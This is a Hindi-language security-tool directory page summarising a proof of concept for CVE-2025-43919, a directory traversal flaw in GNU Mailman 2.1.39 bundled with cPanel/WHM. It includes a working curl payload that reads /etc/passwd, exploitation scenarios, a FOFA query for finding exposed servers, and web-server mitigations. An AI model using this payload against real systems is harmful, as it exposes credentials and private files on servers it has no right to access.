Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-43919-POC — GNU Mailman 2.1.39 में एक नई भेद्यता खोजी गई है, जो cPanel/WHM के साथ बंडल किया गया है, जो बिना प्रमाणीकरण के दूरस्थ हमलावरों को डायरेक्टरी ट्रैवर्सल दोष के माध्यम से सर्वर पर मनमानी फ़ाइलें पढ़ने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/cybersecplayground/cve-2025-43919-poc
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubcybersecplayground/cve-2025-43919-poc

CVE-2025-43919-POC

GNU Mailman 2.1.39 में एक नई भेद्यता खोजी गई है, जो cPanel/WHM के साथ बंडल किया गया है, जो बिना प्रमाणीकरण के दूरस्थ हमलावरों को डायरेक्टरी ट्रैवर्सल दोष के माध्यम से सर्वर पर मनमानी फ़ाइलें पढ़ने की अनुमति देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1161 साल पहलेअभी तक समीक्षित नहीं

🚨 CVE-2025-43919: GNU Mailman 2.1.39 (cPanel/WHM) में डायरेक्टरी ट्रैवर्सल

GNU Mailman 2.1.39 में एक नई भेद्यता खोजी गई है, जो cPanel/WHM के साथ बंडल होता है, जो बिना प्रमाणीकरण वाले रिमोट हमलावरों को डायरेक्टरी ट्रैवर्सल दोष के माध्यम से सर्वर पर मनमानी फाइलें पढ़ने की अनुमति देता है।

📌 भेद्यता सारांश:

  • प्रकार: Directory Traversal (बिना प्रमाणीकरण)
  • घटक: private.py CGI स्क्रिप्ट
  • प्रभावित एंडपॉइंट: /mailman/private/mailman
  • प्रभाव: /etc/passwd, .mbox अभिलेख, और Mailman कॉन्फ़िग जैसी फाइलों का खुलासा
  • CVSS स्कोर: 5.8 (Medium)
  • CVE ID: CVE-2025-43919

स्थिति: कोई आधिकारिक पैच नहीं (Mailman 2.1.x EOL है)

🔥 प्रूफ ऑफ कॉन्सेप्ट:

curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." \
http://target/mailman/private/mailman

🧨 शोषण परिदृश्य:

  • /etc/passwd, configs, या mailbox files डंप करें
  • क्रेडेंशियल्स और संवेदनशील अभिलेख लीक करें
  • RCE या एस्केलेशन के लिए अन्य बग्स के साथ चेन करें

🛡️ शमन उपाय: वेब सर्वर स्तर पर /mailman/private तक पहुंच ब्लॉक करें:

<Location "/mailman/private">
    Require ip 127.0.0.1
    Deny from all
</Location>

या Nginx में:

location /mailman/private {
    deny all;
    return 403;
}

⬆️ Mailman 3.x — 2.x पर माइग्रेट करें — यह EOL है और आधुनिक सुरक्षा उपायों से रहित है

🔍 FOFA क्वेरी : app="Mailman"

📚 और सीखें, जिम्मेदारी से साझा करें, और अपने इंफ्रास्ट्रक्चर को सुरक्षित रखें।

🔒 अधिक वास्तविक दुनिया CVEs, PoCs, और hardening टिप्स के लिए फॉलो करें: 👉 @cybersecplayground

#bugbounty #infosec #exploit #pentest #cve2025 #directorytraversal #linuxsecurity

टूल डाउनलोड करें